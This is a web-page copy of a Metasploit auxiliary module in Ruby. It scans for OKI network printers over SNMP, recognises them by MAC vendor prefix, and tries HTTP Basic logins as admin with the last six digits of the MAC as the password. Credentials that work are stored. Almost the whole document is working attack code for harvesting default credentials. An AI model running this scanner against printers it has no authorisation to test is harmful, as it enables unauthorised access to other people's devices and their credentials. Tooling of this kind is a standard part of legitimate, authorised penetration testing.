Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/oki_scanner.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# TODO: Split this module into two separate SNMP and HTTP modules.

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::SNMPClient

10
  include Msf::Auxiliary::Scanner

11
  include Msf::Auxiliary::Report

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'OKI Printer Default Login Credential Scanner',

18
        'Description' => %q{

19
          This module scans for OKI printers via SNMP, then tries to connect to found devices

20
          with vendor default administrator credentials via HTTP authentication. By default, OKI

21
          network printers use the last six digits of the MAC as admin password.

22
        },

23
        'Author' => 'antr6X <anthr6x[at]gmail.com>',

24
        'License' => MSF_LICENSE,

25
        'Notes' => {

26
          'Reliability' => UNKNOWN_RELIABILITY,

27
          'Stability' => UNKNOWN_STABILITY,

28
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

29
        }

30
      )

31
    )

32


33
    register_options(

34
      [

35
        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),

36
        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])

37
      ]

38
    )

39


40
    deregister_options('RPORT', 'VHOST')

41
  end

42


43
  def cleanup

44
    datastore['RPORT'] = @org_rport

45
  end

46


47
  def report_cred(opts)

48
    service_data = {

49
      address: opts[:ip],

50
      port: opts[:port],

51
      service_name: opts[:service_name],

52
      protocol: 'tcp',

53
      workspace_id: myworkspace_id

54
    }

55


56
    credential_data = {

57
      origin_type: :service,

58
      module_fullname: fullname,

59
      username: opts[:user],

60
      private_data: opts[:password],

61
      private_type: :password

62
    }.merge(service_data)

63


64
    login_data = {

65
      last_attempted_at: Time.now,

66
      core: create_credential(credential_data),

67
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

68
      proof: opts[:proof]

69
    }.merge(service_data)

70


71
    create_credential_login(login_data)

72
  end

73


74
  def run_host(ip)

75
    @org_rport = datastore['RPORT']

76
    datastore['RPORT'] = datastore['SNMPPORT']

77


78
    index_page = "index_ad.htm"

79
    auth_req_page = "status_toc_ad.htm"

80
    snmp = connect_snmp()

81


82
    snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|

83
      last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6, 6].upcase

84
      first_six = mac.value.unpack("H2H2H2H2H2H2").join[0, 6].upcase

85


86
      # check if it is a OKI

87
      # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt

88
      if first_six == "002536" || first_six == "008087" || first_six == "002536"

89
        sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s

90
        print_status("Found: #{sys_name}")

91
        print_status("Trying credential: admin/#{last_six}")

92


93
        tcp = Rex::Socket::Tcp.create(

94
          'PeerHost' => rhost,

95
          'PeerPort' => datastore['HTTPPORT'],

96
          'Context' =>

97
            {

98
              'Msf' => framework,

99
              'MsfExploit' => self

100
            }

101
        )

102


103
        auth = Rex::Text.encode_base64("admin:#{last_six}")

104


105
        http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"

106
        http_data << "Referer: http://#{ip}/#{index_page}\r\n"

107
        http_data << "Authorization: Basic #{auth}\r\n\r\n"

108


109
        tcp.put(http_data)

110
        data = tcp.recv(12)

111


112
        response = "#{data[9..11]}"

113


114
        case response

115
        when "200"

116
          print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")

117
          report_cred(

118
            ip: rhost,

119
            port: datastore['HTTPPORT'],

120
            service_name: 'http',

121
            user: 'admin',

122
            password: last_six,

123
            proof: response.inspect

124
          )

125
        when "401"

126
          print_error("Default credentials failed")

127
        when "404"

128
          print_status("Page not found, try credential manually: admin/#{last_six}")

129
        else

130
          print_status("Unexpected message")

131
        end

132


133
        disconnect()

134
      end

135
    end

136


137
    # No need to make noise about timeouts

138
  rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion

139
  rescue ::Interrupt

140
    raise $!

141
  rescue ::Exception => e

142
    print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")

143
  ensure

144
    disconnect_snmp

145
  end

146
end

147


148